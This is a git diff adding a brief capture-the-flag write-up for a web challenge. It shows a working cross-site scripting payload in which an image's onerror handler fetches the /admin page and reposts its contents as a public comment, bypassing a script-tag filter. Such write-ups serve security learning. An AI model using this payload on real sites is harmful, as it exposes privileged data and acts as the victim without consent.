diff options
Diffstat (limited to 'punkctf/web_04.md')
| -rw-r--r-- | punkctf/web_04.md | 7 |
1 files changed, 7 insertions, 0 deletions
diff --git a/punkctf/web_04.md b/punkctf/web_04.md new file mode 100644 index 0000000..f0cffaa --- /dev/null +++ b/punkctf/web_04.md @@ -0,0 +1,7 @@ + +Now our input sanitises out script fields, however it still allows us to make images. +We use the normal technique of putting a bad image url in them, then adding js in the onerror attribute, with the same JS as `XSS - Medium`. + +``` +<img src=x onerror="fetch('/admin').then(r => r.text()).then(d => {let data = new URLSearchParams(); data.append('name', 'admin page'); data.append('comment', d); fetch('/new-comment', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: data });})"> +``` |